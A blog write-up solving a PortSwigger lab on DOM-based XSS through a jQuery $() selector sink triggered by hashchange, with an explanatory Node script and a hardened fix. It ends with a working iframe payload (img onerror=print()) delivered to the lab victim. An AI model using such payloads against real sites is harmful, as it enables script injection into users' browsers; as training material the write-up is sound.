Solving Portswigger Academy: DOM XSS in jQuery selector sink using a hashchange event

Vishal
3 min read · Oct 6, 2024

This lab contains a DOM-based cross-site scripting vulnerability on the home page. It uses jQuery’s $() selector function to auto-scroll to a given post, whose title is passed via the location.hash property.

To solve the lab, deliver an exploit to the victim that calls the print() function in their browser.

When we open the lab, we find that it is a simple blog site. It does not have any search functionality on the home page.

I looked at the comments section again, but as per the description the vulnerability is on the home page.

So I looked for code on the home page itself: I opened Inspect Element and started going through everything, and at the bottom I found a script section.

The $(window) call shows that the page uses jQuery. The hashchange event fires when the anchor part of the current URL (the fragment, which begins with a '#' sign) changes.

For example, in http://www.example.com/test.htm#part2 the anchor part is #part2. You can trigger the event by changing the anchor part, for instance by setting location.hash.

So whenever the part after the # changes, the handler function runs. Inside that function a variable named post is defined.

The decodeURIComponent() function accepts a string representing an encoded URI (Uniform Resource Identifier) component, decodes it and returns the result. This matters for the exploit: the browser percent-encodes characters such as '<', '>' and spaces when they are placed in the fragment, and this call turns them back into the raw characters before they reach the selector.

The location.hash property returns the anchor part of the URL, including the '#' sign, and can also be used to set it.

The slice() method used here is the String one, not the Array one: it returns the portion of the string from the start index up to (but not including) the end index as a new string.

The string section.blog-list h2:contains(...) is a jQuery selector: it matches the h2 post titles inside the blog list whose text contains the given value. The decoded hash is concatenated straight into this selector string, and that concatenation is the sink.

And slice(1) removes the # sign. If a post whose title contains the word after the # sign is found, the if statement scrolls that post into view so the user sees it automatically.
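To make the sink concrete without a browser, here is an added example (not the lab's script and not the author's code) that rebuilds the selector string exactly as described above and applies the rule jQuery uses to decide whether a string passed to $() is a selector or HTML. The exploit works because the lab page loads a jQuery older than 1.9, in which a string containing a <...> tag anywhere is parsed as HTML; from jQuery 1.9 onwards only a string that starts with '<' is. The function names, the sample post titles and the two hashes are assumptions made for the example. The exploit hash is what location.hash holds after the iframe appends <img src=x onerror=print()> to its src, since '<', '>' and spaces are percent-encoded inside a fragment. The hardened finder shows the fix: keep the fragment out of the selector entirely and compare title text in JavaScript.

```javascript
// Added example (not the lab's own script): rebuild the selector string the
// hashchange handler constructs and apply jQuery's "selector or HTML?" rule,
// so the sink can be reasoned about in Node without a browser or jQuery.

// jQuery 1.8's quick-dispatch regex from jQuery.fn.init: a string that contains
// a <...> tag, with no '#' or '<' before it and no '>' after it, is parsed as
// HTML rather than used as a selector.
const OLD_JQUERY_QUICK_EXPR = /^(?:[^#<]*(<[\w\W]+>)[^>]*$|#([\w\-]*)$)/;

// Assumed helper name. True when a pre-1.9 jQuery would turn $(str) into
// elements created from markup, i.e. when the string reaches the HTML sink.
function treatedAsHtmlByOldJquery(str) {
  if (str.charAt(0) === '<' && str.charAt(str.length - 1) === '>' && str.length >= 3) {
    return true;
  }
  const match = OLD_JQUERY_QUICK_EXPR.exec(str);
  return Boolean(match && match[1]);
}

// Assumed helper name. jQuery 1.9 and later only treat a string as HTML when
// it begins with '<' (leading whitespace allowed).
function treatedAsHtmlByModernJquery(str) {
  return /^\s*</.test(str);
}

// The lab's sink as the post describes it: the decoded fragment (minus the
// leading '#') is concatenated straight into a :contains() selector.
function buildVulnerableSelector(hash) {
  return 'section.blog-list h2:contains(' + decodeURIComponent(hash.slice(1)) + ')';
}

// Hardened alternative (an assumption, not the lab's fix): never put the
// fragment into a selector string. Take the fixed set of post titles and do the
// substring comparison in JavaScript; returns the index of the first match or -1.
function findPostIndex(titles, hash) {
  const wanted = decodeURIComponent(hash.slice(1));
  return titles.findIndex((title) => title.includes(wanted));
}

// Constructed sample data. EXPLOIT_HASH is what location.hash holds once the
// iframe appends <img src=x onerror=print()> to its src: the browser
// percent-encodes '<', '>' and spaces inside a fragment, which is why the
// handler needs decodeURIComponent() for the payload to come back intact.
const TITLES = ['Spider Web Security', 'Wellness Tips'];
const BENIGN_HASH = '#Wellness%20Tips';
const EXPLOIT_HASH = '#%3Cimg%20src=x%20onerror=print()%3E';

// Stand-alone run: shows which path each hash takes through the sink.
for (const hash of [BENIGN_HASH, EXPLOIT_HASH]) {
  const selector = buildVulnerableSelector(hash);
  console.log(JSON.stringify(selector));
  console.log('  old jQuery parses as HTML:', treatedAsHtmlByOldJquery(selector));
  console.log('  jQuery >= 1.9 parses as HTML:', treatedAsHtmlByModernJquery(selector));
  console.log('  hardened lookup index:', findPostIndex(TITLES, hash));
}
```

Run it with node. The benign hash produces a plain selector on both rules; the exploit hash produces a string that the old rule hands to the HTML parser (creating the img element, whose onerror runs print()) while the 1.9+ rule would still treat it as a selector. The hardened lookup never builds a selector from user input, so the payload is just a title that does not exist.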

Let's add an XSS payload after the # sign and see what happens.

We are able to trigger the XSS. Now we need to deliver it to the victim in a way that calls print() in their browser. Because the handler only runs on a hashchange event, linking the victim to a URL that already carries the payload in the fragment is not enough: the hash has to change after the page has loaded. An iframe does this for us. It loads the lab page with an empty fragment, and its onload handler then appends the payload to src, which changes the hash and fires the event.

<iframe src="https://0aa200fc0387923a80d145ae00400028.web-security-academy.net/#" onload="this.src+='<img src=x onerror=print()>'"></iframe>

Save it on the exploit server and deliver it to the victim.
